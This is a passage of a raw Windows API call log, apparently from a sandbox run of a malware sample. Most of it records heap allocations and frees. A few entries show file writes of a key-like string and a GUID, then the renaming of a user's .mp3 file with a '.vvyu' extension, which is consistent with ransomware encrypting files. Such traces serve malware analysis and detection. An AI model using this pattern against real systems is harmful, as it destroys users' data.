hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2be8 | out: hHeap=0x620000) returned 1 [0194.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c30 | out: hHeap=0x620000) returned 1 [0194.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bd0 | out: hHeap=0x620000) returned 1 [0194.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ba0 | out: hHeap=0x620000) returned 1 [0194.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0194.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b88 | out: hHeap=0x620000) returned 1 [0194.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0194.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.776] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x8a57, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x8a57, lpOverlapped=0x0) returned 1 [0194.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0194.777] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x8a5c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.778] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0194.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.779] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.780] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.780] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.780] CloseHandle (hObject=0x568) returned 1 [0194.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0194.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea3a68 [0194.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0194.781] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\YXHaYB.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\yxhayb.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\YXHaYB.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\yxhayb.mp3.vvyu")) returned 1 [0194.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.783] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.785] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x698cce90, ftCreationTime.dwHighDateTime=0x1d89fcc, ftLastAccessTime.dwLowDateTime=0x64815980, ftLastAccessTime.dwHighDateTime=0x1d8a27d, ftLastWriteTime.dwLowDateTime=0x64815980, ftLastWriteTime.dwHighDateTime=0x1d8a27d, nFileSizeHigh=0x0, nFileSizeLow=0x8a5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YXHaYB.mp3", cAlternateFileName="")) returned 0 [0194.785] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0194.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0194.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0194.786] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0194.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0194.786] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0194.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0194.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0194.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.820] HeapFree (in: 